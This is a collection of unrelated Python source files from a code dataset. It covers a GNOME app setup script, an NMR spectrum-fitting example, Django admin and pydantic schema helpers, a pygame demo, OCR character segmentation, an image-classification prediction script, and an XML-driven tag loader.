PARTICULAR PURPOSE. See the GNU General Public License for\n# more details.\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA\n##\n\nfrom distutils.core import setup, Command\nfrom distutils.command.install_scripts import install_scripts\nfrom distutils.command.install_data import install_data\nfrom distutils.log import info\n\nimport os\nimport os.path\nimport shutil\nimport subprocess\nfrom itertools import chain\nfrom glob import glob\n\nfrom gnome_appfolders_manager.functions import recursive_glob\nfrom gnome_appfolders_manager.constants import (\n APP_NAME, APP_VERSION, APP_DESCRIPTION,\n APP_AUTHOR, APP_AUTHOR_EMAIL, APP_URL,\n DOMAIN_NAME)\n\n\nclass Install_Scripts(install_scripts):\n def run(self):\n install_scripts.run(self)\n self.rename_python_scripts()\n\n def rename_python_scripts(self):\n \"Rename main executable python script without .py extension\"\n for script in self.get_outputs():\n if script.endswith(\".py\"):\n info('renaming the python script %s -> %s' % (\n script, script[:-3]))\n shutil.move(script, script[:-3])\n\n\nclass Install_Data(install_data):\n def run(self):\n self.install_icons()\n self.install_translations()\n install_data.run(self)\n\n def install_icons(self):\n info('Installing icons...')\n DIR_ICONS = 'icons'\n for icon_format in os.listdir(DIR_ICONS):\n icon_dir = os.path.join(DIR_ICONS, icon_format)\n self.data_files.append((\n os.path.join('share', 'icons', 'hicolor', icon_format, 'apps'),\n glob(os.path.join(icon_dir, '*'))))\n\n def install_translations(self):\n info('Installing translations...')\n for po in glob(os.path.join('po', '*.po')):\n lang = os.path.basename(po[:-3])\n mo = os.path.join('build', 'mo', lang, '%s.mo' % DOMAIN_NAME)\n\n directory = os.path.dirname(mo)\n if not os.path.exists(directory):\n info('creating %s' % directory)\n os.makedirs(directory)\n\n cmd = 'msgfmt -o %s %s' % (mo, po)\n info('compiling %s -> %s' % (po, mo))\n if os.system(cmd) != 0:\n raise SystemExit('Error while running msgfmt')\n\n dest = os.path.join('share', 'locale', lang, 'LC_MESSAGES')\n self.data_files.append((dest, [mo]))\n\n\nclass Command_CreatePOT(Command):\n description = \"create base POT file\"\n user_options = [\n ('use-intltool-extract', None, 'Use intltool-extract'),\n ('keep-headers', None, 'Do not delete header files'),\n ]\n boolean_options = ('use-intltool-extract')\n\n def initialize_options(self):\n self.use_intltool_extract = False\n self.keep_headers = False\n\n def finalize_options(self):\n self.dir_base = os.path.dirname(os.path.abspath(__file__))\n self.dir_po = os.path.join(self.dir_base, 'po')\n\n def run(self):\n self.dir_ui = os.path.join(self.dir_base, 'ui')\n file_pot = '%s.pot' % os.path.join(self.dir_po, DOMAIN_NAME)\n list_files_process = []\n list_files_remove = []\n if self.use_intltool_extract:\n # Scan *.ui files to extract messages\n for filename in glob(os.path.join(self.dir_ui, '*.ui')):\n header_file = '%s.h' % filename\n # Clear previous existing files\n if os.path.isfile(header_file):\n os.unlink(header_file)\n # Extract data from the interface files\n subprocess.call(args=('intltool-extract',\n '--quiet',\n '--type=gettext/glade',\n os.path.basename(filename)),\n cwd=os.path.dirname(filename))\n if os.path.getsize(header_file) > 0:\n # Add the header files to the list of the files to process\n list_files_process.append(os.path.relpath(header_file,\n self.dir_base))\n # All the header files must be removed after the process\n list_files_remove.append(header_file)\n else:\n # Add *.ui files to list of files to process\n for filename in glob(os.path.join(self.dir_ui, '*.ui')):\n list_files_process.append(os.path.relpath(filename,\n self.dir_base))\n # Add *.py files to list of files to process\n for filename in recursive_glob(self.dir_base, '*.py'):\n list_files_process.append(os.path.relpath(filename,\n self.dir_base))\n # Sort the files to process them always in the same order (hopefully)\n list_files_process.sort()\n # Extract messages from the files to process\n subprocess.call(\n args=chain(('xgettext',\n '--keyword=_',\n '--keyword=N_',\n '--output=%s' % file_pot,\n '--add-location',\n '--package-name=%s' % APP_NAME,\n '--package-version=%s' % APP_VERSION,\n '--copyright-holder=%s' % APP_AUTHOR,\n '--msgid-bugs-address=%s' % APP_AUTHOR_EMAIL),\n list_files_process),\n cwd=self.dir_base)\n # Remove uneeded files if requested\n if not self.keep_headers:\n for filename in list_files_remove:\n if os.path.isfile(filename):\n os.unlink(filename)\n\n\nclass Command_CreatePO(Command):\n description = \"create translation PO file\"\n user_options = [\n ('locale=', None, 'Define locale'),\n ('output=', None, 'Define output file'),\n ]\n\n def initialize_options(self):\n self.locale = None\n self.output = None\n\n def finalize_options(self):\n self.dir_base = os.path.dirname(os.path.abspath(__file__))\n self.dir_po = os.path.join(self.dir_base, 'po')\n assert (self.locale), 'Missing locale'\n assert (self.output), 'Missing output file'\n\n def run(self):\n self.dir_ui = os.path.join(self.dir_base, 'ui')\n file_pot = '%s.pot' % os.path.join(self.dir_po, DOMAIN_NAME)\n file_po = '%s.po' % os.path.join(self.dir_po, self.output)\n # Create PO file\n subprocess.call(\n args=('msginit',\n '--input=%s' % file_pot,\n '--no-translator',\n '--output-file=%s' % file_po,\n '--locale=%s' % self.locale),\n cwd=self.dir_base)\n\n\nclass Command_Translations(Command):\n description = \"build translations\"\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n self.dir_base = os.path.dirname(os.path.abspath(__file__))\n self.dir_po = os.path.join(self.dir_base, 'po')\n self.dir_mo = os.path.join(self.dir_base, 'locale')\n\n def run(self):\n file_pot = '%s.pot' % os.path.join(self.dir_po, DOMAIN_NAME)\n for file_po in glob(os.path.join(self.dir_po, '*.po')):\n subprocess.call(('msgmerge', '--update', '--backup=off',\n file_po, file_pot))\n lang = os.path.basename(file_po[:-3])\n file_mo = os.path.join(self.dir_mo, lang, 'LC_MESSAGES',\n '%s.mo' % DOMAIN_NAME)\n dir_lang = os.path.dirname(file_mo)\n if not os.path.exists(dir_lang):\n os.makedirs(dir_lang)\n subprocess.call(('msgfmt', '--output-file', file_mo, file_po))\n\n\nsetup(\n name=APP_NAME,\n version=APP_VERSION,\n author=APP_AUTHOR,\n author_email=APP_AUTHOR_EMAIL,\n maintainer=APP_AUTHOR,\n maintainer_email=APP_AUTHOR_EMAIL,\n url=APP_URL,\n description=APP_DESCRIPTION,\n license='GPL v2',\n scripts=['gnome-appfolders-manager.py'],\n packages=['gnome_appfolders_manager', 'gnome_appfolders_manager.models',\n 'gnome_appfolders_manager.ui'],\n data_files=[\n ('share/gnome-appfolders-manager/data',\n ['data/gnome-appfolders-manager.png']),\n ('share/applications',\n ['data/gnome-appfolders-manager.desktop']),\n ('share/doc/gnome-appfolders-manager',\n list(chain(glob('doc/*'), glob('*.md')))),\n ('share/gnome-appfolders-manager/ui',\n glob('ui/*')),\n ],\n cmdclass={\n 'install_scripts': Install_Scripts,\n 'install_data': Install_Data,\n 'create_pot': Command_CreatePOT,\n 'create_po': Command_CreatePO,\n 'translations': Command_Translations\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":9680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"485046744","text":"#!/usr/bin/env python\n\"\"\"\n²H MAS NMR of Methionine\n^^^^^^^^^^^^^^^^^^^^^^^^\n\"\"\"\n# %%\n# The following is a least-squares fitting example of a :math:`^{2}\\text{H}` MAS NMR\n# spectrum of Methionine. The experimental dataset is a part of DMFIT [#f1]_ examples.\n# We thank Dr. Dominique Massiot for sharing the dataset.\nimport csdmpy as cp\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom lmfit import Minimizer\n\nfrom mrsimulator import Simulator, SpinSystem, Site\nfrom mrsimulator.method.lib import BlochDecaySpectrum\nfrom mrsimulator import signal_processor as sp\nfrom mrsimulator.utils import spectral_fitting as sf\nfrom mrsimulator.utils import get_spectral_dimensions\nfrom mrsimulator.spin_system.tensors import SymmetricTensor\n\n# sphinx_gallery_thumbnail_number = 4\n\n# %%\n# Import the dataset\n# ------------------\nhost = \"https://nmr.cemhti.cnrs-orleans.fr/Dmfit/Help/csdm/\"\nfilename = \"2H methiodine MAS.csdf\"\nexperiment = cp.load(host + filename)\n\n# For spectral fitting, we only focus on the real part of the complex dataset\nexperiment = experiment.real\n\n# Convert the coordinates along each dimension from Hz to ppm.\n_ = [item.to(\"ppm\", \"nmr_frequency_ratio\") for item in experiment.dimensions]\n\n# plot of the dataset.\nplt.figure(figsize=(4.25, 3.0))\nax = plt.subplot(projection=\"csdm\")\nax.plot(experiment, color=\"black\", linewidth=0.5, label=\"Experiment\")\nax.set_xlim(600, -700)\nplt.grid()\nplt.tight_layout()\nplt.show()\n\n# %%\n# Estimate noise statistics from the dataset\ncoords = experiment.dimensions[0].coordinates\nnoise_region = np.where(np.logical_and(coords > -250e-6, coords < -210e-6))\nnoise_data = experiment[noise_region]\n\nplt.figure(figsize=(3.75, 2.5))\nax = plt.subplot(projection=\"csdm\")\nax.plot(noise_data, label=\"noise\")\nplt.title(\"Noise section\")\nplt.axis(\"off\")\nplt.tight_layout()\nplt.show()\n\nnoise_mean, sigma = experiment[noise_region].mean(), experiment[noise_region].std()\nnoise_mean, sigma\n\n# %%\n# Create a fitting model\n# ----------------------\n# **Spin System**\nH_2 = Site(\n isotope=\"2H\",\n isotropic_chemical_shift=-57.12, # in ppm,\n quadrupolar=SymmetricTensor(Cq=3e4, eta=0.0), # Cq in Hz\n)\n\nspin_systems = [SpinSystem(sites=[H_2])]\n\n# %%\n# **Method**\n\n# Get the spectral dimension parameters from the experiment.\nspectral_dims = get_spectral_dimensions(experiment)\n\nMAS = BlochDecaySpectrum(\n channels=[\"2H\"],\n magnetic_flux_density=9.395, # in T\n rotor_frequency=4517.1, # in Hz\n spectral_dimensions=spectral_dims,\n experiment=experiment, # experimental dataset\n)\n\n\n# %%\n# **Guess Model Spectrum**\n\n# Simulation\n# ----------\nsim = Simulator(spin_systems=spin_systems, methods=[MAS])\nsim.run()\n\n# Post Simulation Processing\n# --------------------------\nprocessor = sp.SignalProcessor(\n operations=[\n sp.IFFT(),\n sp.apodization.Exponential(FWHM=\"60 Hz\"),\n sp.FFT(),\n sp.Scale(factor=140),\n ]\n)\nprocessed_dataset = processor.apply_operations(dataset=sim.methods[0].simulation).real\n\n# Plot of the guess Spectrum\n# --------------------------\nplt.figure(figsize=(4.25, 3.0))\nax = plt.subplot(projection=\"csdm\")\nax.plot(experiment, color=\"black\", linewidth=0.5, label=\"Experiment\")\nax.plot(processed_dataset, linewidth=2, alpha=0.6, label=\"Guess Spectrum\")\nax.set_xlim(600, -700)\nplt.grid()\nplt.legend()\nplt.tight_layout()\nplt.show()\n\n\n# %%\n# Least-squares minimization with LMFIT\n# -------------------------------------\n# Use the :func:`~mrsimulator.utils.spectral_fitting.make_LMFIT_params` for a quick\n# setup of the fitting parameters.\nparams = sf.make_LMFIT_params(sim, processor)\nparams[\"sys_0_site_0_isotropic_chemical_shift\"].vary = False\nprint(params.pretty_print(columns=[\"value\", \"min\", \"max\", \"vary\", \"expr\"]))\n\n# %%\n# **Solve the minimizer using LMFIT**\nopt = sim.optimize() # Pre-compute transition pathways\nminner = Minimizer(\n sf.LMFIT_min_function,\n params,\n fcn_args=(sim, processor, sigma),\n fcn_kws={\"opt\": opt},\n)\nresult = minner.minimize()\nresult\n\n# %%\n# The best fit solution\n# ---------------------\nbest_fit = sf.bestfit(sim, processor)[0].real\nresiduals = sf.residuals(sim, processor)[0].real\n\n# Plot the spectrum\nplt.figure(figsize=(4.25, 3.0))\nax = plt.subplot(projection=\"csdm\")\nax.plot(experiment, color=\"black\", linewidth=0.5, label=\"Experiment\")\nax.plot(residuals, color=\"gray\", linewidth=0.5, label=\"Residual\")\nax.plot(best_fit, linewidth=2, alpha=0.6, label=\"Best Fit\")\nax.set_xlim(600, -700)\nplt.grid()\nplt.legend()\nplt.tight_layout()\nplt.show()\n\n# %%\n#\n# .. [#f1] D.Massiot, F.Fayon, M.Capron, I.King, S.Le Calvé, B.Alonso, J.O.Durand,\n# B.Bujoli, Z.Gan, G.Hoatson, 'Modelling one and two-dimensional solid-state NMR\n# spectra.', Magn. Reson. Chem. **40** 70-76 (2002)\n# `DOI: 10.1002/mrc.984 `_\n","sub_path":"fitting_source/1D_fitting/plot_4_2H_quad.py","file_name":"plot_4_2H_quad.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"361525273","text":"# organizations/admin.py\nimport typing\nfrom django.contrib import admin\nfrom django.db import models\nfrom django.http.request import HttpRequest\nfrom rest_framework_api_key.admin import APIKeyModelAdmin\nfrom .models import DosUserAPIKey\n\nadmin.site.site_header = \"Capacity Status API Administration\"\n\n\n@admin.register(DosUserAPIKey)\nclass DosUserAPIKeyModelAdmin(APIKeyModelAdmin):\n\n # form = DosUserAPIKeyAdminForm\n is_change_view_call = False\n\n def get_exclude(self, request, obj=None):\n if self.exclude:\n self.exclude += [\"dos_user_id\", \"name\"]\n else:\n self.exclude = [\"dos_user_id\", \"name\"]\n\n return super().get_exclude(request, obj)\n\n def get_readonly_fields(\n self, request: HttpRequest, obj: models.Model = None\n ) -> typing.Tuple[str, ...]:\n fields = super().get_readonly_fields(request, obj)\n if self.is_change_view_call:\n fields += (\"dos_username\",)\n return fields\n\n def change_view(self, request, object_id, form_url=\"\", extra_context=None):\n self.is_change_view_call = True\n return_value = super().change_view(request, object_id, form_url, extra_context)\n self.is_change_view_call = False\n return return_value\n","sub_path":"application/api/capacityauth/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"503797589","text":"import re\nfrom enum import Enum\nfrom typing import Any, Callable, Dict, Iterator, Mapping, Optional, Pattern, Set, Type\n\nfrom fastapi.encoders import jsonable_encoder\nfrom pydantic import BaseConfig, BaseModel, ConstrainedStr, create_model\n\nfrom .helpers import is_async_iterable, is_awaitable, is_iterable, is_mappable\n\n\nclass SchemaConfig(BaseConfig):\n api_component_name: Optional[str] = None\n api_component_name_plural: Optional[str] = None\n default_readable_fields: 'SchemaFields' = set()\n read_only_fields: 'SchemaFields' = set()\n write_only_fields: 'SchemaFields' = set()\n\n\nclass Schema(BaseModel):\n __config__: Type[SchemaConfig]\n _cache: Dict[str, Any] = {}\n\n def __init_subclass__(cls, **kwargs: Any):\n super().__init_subclass__()\n cls._cache = {}\n\n class Config(SchemaConfig):\n ...\n\n @classmethod\n def optional(cls, class_name: str = None) -> 'SchemaClass':\n class_name = class_name or f'{cls.__name__}Optional'\n model = cls._cache.get(class_name)\n if model is None:\n fields = {\n field_name: (field.type_, None) for field_name, field in cls.__fields__.items()\n }\n model = create_model(\n class_name, __base__=cls, __module__=cls.__module__, **fields # type: ignore\n )\n # Prevent class from recreation on each call,\n # otherwise OpenAPI schema generation is broken\n cls._cache[class_name] = model\n return model # type: ignore\n\n @classmethod\n def get_config(cls) -> Type[SchemaConfig]:\n return cls.__config__\n\n @classmethod\n def get_read_only_fields(cls) -> 'SchemaFields':\n return cls.__config__.read_only_fields & set(cls.__fields__.keys())\n\n @classmethod\n def get_write_only_fields(cls) -> 'SchemaFields':\n return cls.__config__.write_only_fields & set(cls.__fields__.keys())\n\n @classmethod\n def get_readable_fields(cls) -> 'SchemaFields':\n return set(cls.__fields__.keys()) - cls.get_write_only_fields()\n\n @classmethod\n def get_writable_fields(cls) -> 'SchemaFields':\n return set(cls.__fields__.keys()) - cls.get_read_only_fields()\n\n @classmethod\n def get_default_readable_fields(cls) -> 'SchemaFields':\n return (\n cls.__config__.default_readable_fields & set(cls.__fields__.keys())\n or cls.get_readable_fields()\n )\n\n @classmethod\n def get_field_max_length(cls, field_name: str) -> Optional[int]:\n field = cls.__fields__.get(field_name)\n if not field:\n return None\n field_type = field.type_\n if issubclass(field_type, ConstrainedStr):\n max_length = field_type.max_length\n elif isinstance(field_type, type) and issubclass(field_type, Enum):\n members_lengths = (len(str(i.value)) for i in field_type)\n max_length = max(members_lengths)\n else:\n max_length = field.field_info.max_length\n return int(max_length) if max_length else None\n\n @classmethod\n def get_default_response_fields_config(cls) -> 'ResponseFieldsConfig':\n config = cls._cache.get('default_response_fields_config')\n if config is None:\n config = {}\n for field_name in cls.get_default_readable_fields():\n nested_model = cls.__fields__[field_name].type_\n if is_subschema(nested_model):\n subfields = nested_model.get_default_readable_fields()\n else:\n subfields = set()\n config[field_name] = subfields\n cls._cache['default_response_fields_config'] = config\n return config\n\n @classmethod\n def get_full_response_fields_config(cls) -> 'ResponseFieldsConfig':\n config = {}\n for field_name in cls.get_readable_fields():\n nested_model = cls.__fields__[field_name].type_\n if is_subschema(nested_model):\n subfields = nested_model.get_readable_fields()\n else:\n subfields = set()\n config[field_name] = subfields\n return config\n\n @classmethod\n async def serialize(\n cls, obj: Any, fields: Optional[Mapping] = None, jsonable: bool = True, full: bool = False\n ) -> Any:\n if is_async_iterable(obj):\n obj = [obj async for obj in obj]\n is_mapping = is_mappable(obj)\n if not is_mapping and is_iterable(obj):\n return [await cls.serialize(item, fields, jsonable=jsonable, full=full) for item in obj]\n if not fields:\n fields = (\n cls.get_full_response_fields_config()\n if full\n else cls.get_default_response_fields_config()\n )\n serialized = {}\n for field_name, subfields in fields.items():\n if field_name not in cls.get_readable_fields():\n continue\n field = cls.__fields__[field_name]\n field_value = await cls._getattr(\n obj, field_name, default=field.default, is_mapping=is_mapping\n )\n if is_subschema(field.type_):\n subschema: Type[Schema] = field.type_\n subfields_config = (\n subschema.get_full_response_fields_config()\n if full\n else subschema.get_default_response_fields_config()\n )\n subattrs = {\n **subfields_config,\n **{\n subattr: set()\n for subattr in (subfields or [])\n if subattr in subschema.get_readable_fields()\n },\n }\n field_value = await subschema.serialize(\n field_value, fields=subattrs, jsonable=False\n )\n serialized[field_name] = field_value\n return jsonable_encoder(serialized) if jsonable else serialized\n\n async def get_serialized(self, fields: Optional[Mapping] = None, jsonable: bool = True) -> Any:\n return await self.serialize(self, fields=fields, jsonable=jsonable)\n\n @classmethod\n async def _getattr(\n cls, obj: Any, name: str, default: Any = None, is_mapping: bool = False,\n ) -> Any:\n if is_mapping:\n value = obj.get(name, None)\n else:\n value = getattr(obj, name, None)\n if callable(value):\n value = value()\n if is_awaitable(value):\n value = await value\n if is_async_iterable(value):\n value = [val async for val in value]\n return value or default\n\n\nclass ApiComponentName(str):\n REGEX: Pattern = re.compile(r'[a-z_]+', flags=re.IGNORECASE)\n\n @classmethod\n def __get_validators__(cls) -> Iterator[Callable]:\n yield cls.validate # pragma: no cover\n\n @classmethod\n def validate(cls, value: Any) -> 'ApiComponentName':\n if not isinstance(value, str):\n raise TypeError('API component name must be a string')\n elif not value:\n raise ValueError('API component name must not be empty')\n elif not cls.REGEX.fullmatch(value):\n raise ValueError(\n f'API component name \"{value}\" is invalid' f'(allowed pattern: {cls.REGEX.pattern})'\n )\n return cls(value.lower())\n\n\ndef validate_schema(schema: Any) -> None:\n assert isinstance(schema, type), f'{schema} is not a class'\n assert issubclass(schema, Schema), f'{schema} is not subclassed from {Schema.__name__}'\n\n\ndef is_subschema(type_: Any) -> bool:\n return isinstance(type_, type) and issubclass(type_, Schema)\n\n\nSchemaClass = Type[Schema]\nSchemaFields = Set[str]\nResponseFieldsConfig = Dict[str, Set[str]]\n","sub_path":"freddie/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":7788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"51826522","text":"# inicializar pygame\nimport sys, pygame\npygame.init()\n\n# guardo el color negro en un vector (r, g, b) para despues\nblack = (0, 0, 0)\n\n# crear pantalla, hay que darle el tamano de la pantalla en un vector\ntamano_pantalla = [1000, 800]\nscreen = pygame.display.set_mode(tamano_pantalla)\n\n# cargar la imagen de una pelota\nim_pelota = pygame.image.load(\"ball.bmp\")\n# crear un rectangulo que va a representar a la pelota, hay que darle un\n# vector que es la posicion y otro que es el tamano\nrect_pelota = pygame.Rect([0, 0], [111, 111])\n# guardar velocidad de la pelota en un vector [Vx, Vy] medida en pixeles/frame\nvel_pelota = [2, 2]\n\n# crear un reloj que se puede usar como limitador de fps\nclock = pygame.time.Clock()\n\n# entrar a un loop que no termina nunca\nwhile 1:\n # esperar a que pase 1/60 de segundo para limitar los fps a 60\n clock.tick(60)\n\n # ver si se apreto el boton de cerrar, si es asi, salir\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n # el rectangulo ya tiene una funcion que lo mueve lo que diga el vector,\n # si el vector es por ej. [5, -6] el rectangulo se va a mover 5 a la\n # derecha y 6 para arriba\n rect_pelota = rect_pelota.move(vel_pelota)\n\n # si el rectangulo esta muy a la derecha o muy a la izquierda\n if rect_pelota.left < 0 or rect_pelota.right > tamano_pantalla[0]:\n # invertir la velocidad en x\n vel_pelota[0] = -vel_pelota[0]\n # si el rectangulo esta muy arriba o muy abajo\n if rect_pelota.top < 0 or rect_pelota.bottom > tamano_pantalla[1]:\n # invertir velocidad en y\n vel_pelota[1] = -vel_pelota[1]\n\n # pintar la pantalla de negro para tapar el frame anterior, fijense que pasa\n # si borran o comentan esta linea\n screen.fill(black)\n # dibujar la pelota en las coodenadas del rectangulo\n screen.blit(im_pelota, rect_pelota)\n # mostrar la pantalla\n pygame.display.flip()\n\n","sub_path":"prueba1/prueba2.py","file_name":"prueba2.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"275601835","text":"from PIL import Image\nimport pytesseract\nimport queue\n\ndef binarizing(img,threshold):\n \"\"\"传入image对象进行灰度、二值处理\"\"\"\n img = img.convert(\"L\") # 转灰度\n # img.show()\n pixdata = img.load()\n w, h = img.size\n # 遍历所有像素,小于阈值的为黑色\n for y in range(h):\n for x in range(w):\n if pixdata[x, y] < threshold:\n pixdata[x, y] = 255\n else:\n pixdata[x, y] = 0\n return img\ndef depoint(img):\n \"\"\"传入二值化后的图片进行降噪\"\"\"\n pixdata = img.load()\n w,h = img.size\n for y in range(1,h-1):\n for x in range(1,w-1):\n count = 0\n if pixdata[x,y-1] > 245:#上\n count = count + 1\n if pixdata[x,y+1] > 245:#下\n count = count + 1\n if pixdata[x-1,y] > 245:#左\n count = count + 1\n if pixdata[x+1,y] > 245:#右\n count = count + 1\n if pixdata[x-1,y-1] > 245:#左上\n count = count + 1\n if pixdata[x-1,y+1] > 245:#左下\n count = count + 1\n if pixdata[x+1,y-1] > 245:#右上\n count = count + 1\n if pixdata[x+1,y+1] > 245:#右下\n count = count + 1\n if count > 4:\n pixdata[x,y] = 255\n return img\n# CFS连通域分割法\ndef cfs(img):\n \"\"\"传入二值化后的图片进行连通域分割\"\"\"\n pixdata = img.load()\n w,h = img.size\n visited = set()\n q = queue.Queue()\n offset = [(-1,-1),(0,-1),(1,-1),(-1,0),(1,0),(-1,1),(0,1),(1,1)]\n cuts = []\n for x in range(w):\n for y in range(h):\n x_axis = []\n #y_axis = []\n if pixdata[x,y] == 0 and (x,y) not in visited:\n q.put((x,y))\n visited.add((x,y))\n while not q.empty():\n x_p,y_p = q.get()\n for x_offset,y_offset in offset:\n x_c,y_c = x_p+x_offset,y_p+y_offset\n if (x_c,y_c) in visited:\n continue\n visited.add((x_c,y_c))\n try:\n if pixdata[x_c,y_c] == 0:\n q.put((x_c,y_c))\n x_axis.append(x_c)\n #y_axis.append(y_c)\n except:\n pass\n if x_axis:\n min_x,max_x = min(x_axis),max(x_axis)\n if max_x - min_x > 3:\n # 宽度小于3的认为是噪点,根据需要修改\n cuts.append((min_x,max_x))\n return cuts\ndef getCuts1(cuts):\n newcuts = []\n last = 0\n for item in cuts:\n if newcuts.__len__() == 0:\n newcuts.append(item)\n last = item[1]\n else:\n if last - item[0] > 10 or (newcuts[len(newcuts) - 1][1] - newcuts[len(newcuts) - 1][0] <= 30):\n first = newcuts[len(newcuts) - 1][0]\n last = max(last,item[1])\n newcuts.pop()\n # newcuts.remove(len(newcuts))\n newcuts.append((first, last))\n else:\n newcuts.append(item)\n last = item[1]\n return newcuts\n\ndef getCuts2 (img, cuts):\n '''分离粘连字符'''\n newcuts = []\n for item in cuts:\n if item[1] - item[0] > 60:\n mid = getCuts3(img, (item[0] + item[1]) // 2)\n newcuts.append((item[0], mid))\n newcuts.append((mid, item[1]))\n else:\n newcuts.append(item)\n return newcuts\ndef getCuts3(img, mid):\n offset = 20\n pixdata = img.load()\n w, h = img.size\n wl = 0 if(0 > mid - offset) else mid - offset\n wr = mid + offset if(mid + offset < w) else w\n min = h\n ret = 0\n for x in range(wl, wr):\n count = 0\n for y in range(h):\n if (pixdata[x, y] == 0):\n count = count + 1\n if min > count:\n min = count\n ret = x\n return ret\n\nif __name__ == '__main__':\n src = None\n try:\n src = Image.open('first2.png')\n except FileNotFoundError:\n print('打开文件失败')\n exit(0)\n img = binarizing(src, 160)\n img = depoint(img)\n img.show()\n cuts = cfs(img)\n print(cuts)\n cuts = getCuts1(cuts)\n cuts = getCuts2(img, cuts)\n print(cuts)\n # images = []\n w, h = img.size\n for i, n in enumerate(cuts, 1):\n temp = img.crop((n[0], 0, n[1], h)) # 调用crop函数进行切割\n # images.append(temp)\n text = pytesseract.image_to_string(temp)\n print(text)\n temp.show()\n # text=pytesseract.image_to_string(img)\n # print(text)\n # img.show()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"426982304","text":"def get_next_date(some_date):\n \"\"\"Возвращает следующую дату для заданной\n\n Args:\n some_date: определенная исходная дата\n\n Returns: следующая дата\n \"\"\"\n if some_date in range(1,30):\n print(some_date+1)\n elif some_date == 31:\n print(\"1\")\n else:\n print(\"введена не верная дата\")\n\n raise NotImplementedError\n","sub_path":"day_1/flow_control/task_4/implementation.py","file_name":"implementation.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"581636119","text":"import cv2\nimport pandas as pd\nimport os\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport csv\n\nCATEGORIES = [\n \"manipuri\", \n \"bharatanatyam\", \n \"odissi\", \n \"kathakali\", \n \"kathak\", \n \"sattriya\", \n \"kuchipudi\",\n \"mohiniyattam\"\n]\n\ntest_csv = \"./data/test.csv\"\t\t# Path to test.csv file\ntest_images = \"./data/test/\"\t\t# Path to test images folder\n\nmodel = tf.keras.models.load_model('./cnn.model')\n\n# Preprocess image before testing\ndef preprocess(image):\n IMG_SIZE = 200\n img_array = cv2.imread(image, cv2.IMREAD_GRAYSCALE)\n img_array = img_array / 255.0\n new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n return new_array.reshape(-1, IMG_SIZE, IMG_SIZE, 1)\n\ndef img_predict(image):\n\t\"\"\"\n\tFunction takes a path of images and return \n\tthe predicted label.\n\t\"\"\"\n\n\timg = preprocess(image)\n\tpredict = model.predict(img)\n\tlabel = np.argmax([predict[0]])\n\treturn label\n\ndef prediction(path, test_images):\n\t\"\"\"\n\tFunction takes the path of the csv file, and the path to images folder\n\tExtracts the test image using csv from the test folder\n\tPasses it to predict and appends the res to test_result.csv\n\t\"\"\"\n\tcsv_file = \"predictions.csv\"\n\tres = []\n\tdf = pd.read_csv(path)\n\timages = df['Image']\n\timages = df.to_numpy(images)\t\t# Convert df to numpy\n\tprint(f\"Test Size: {len(images)}\")\n\tfor img in images:\n\t\tprint(f\"Current image {img}\")\n\t\timg = img[0]\n\t\timg_path = os.path.join(test_images, img)\n\t\tlabel = img_predict(img_path)\n\t\tres.append(CATEGORIES[label])\n\n\tprint(\"Prediction complete . . .\")\n\tprint(\"Writing CSV file \")\n\n\twith open(csv_file, 'w') as f:\n\t\tw = csv.writer(f)\n\t\tw.writerow([\"Image\", \"target\"])\n\t\tfor i in range(len(images)):\n\t\t\tw.writerow([images[i][0], res[i]])\n\n\n\nprediction(test_csv, test_images)","sub_path":"predictl.py","file_name":"predictl.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"27554675","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 1 22:42:52 2015\n\n@author: scholl\n\"\"\"\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 1 16:48:16 2015\n\n@author: scholl\n\"\"\"\n\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nfrom aware import *\nfrom data import *\nfrom hmi import *\n\nfrom doisWidget import *\n\nfrom XMLFactorTag import *\nfrom XMLFactorAdapter import *\n\nimport threading\n\n \nif __name__ == \"__main__\":\n import sys\n app = QtGui.QApplication(sys.argv)\n MainWindow = QtGui.QMainWindow()\n \n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n\n scan = Scan()\n \n listaTags = XMLFactorTag('Tag1.xml').create\n listaAdapters = XMLFactorAdapter(\"Adapter01.xml\").create\n \n tagsAdapter = []\n\n \n for tags in listaTags:\n tag_ = tags\n tag_ = tag_[:len(tag_)-1]\n tag_ = tag_.split(\",\")\n \n #Inicializa TAG\n tag = (tag_[1]).replace(\")\",\"\").replace(\"'\",\"\")\n ##############################3\n exec(tag+\"= Tag()\")\n \n #exec('globals()['+tag+'] = Tag()')\n ##############################\n adapter = tag_[10]\n tagsAdapter.append(adapter)\n #print \"adapter:\", adapter\n exec(adapter+\"= None\")\n #exec('globals()['+adapter+'] = '+adapter)\n \n \n #print \"TENTA GERAR ADAPTERS\"\n for adapter in listaAdapters:\n exec(adapter)\n \n #print \"TENTA GERAR TAGS\"\n for tag in 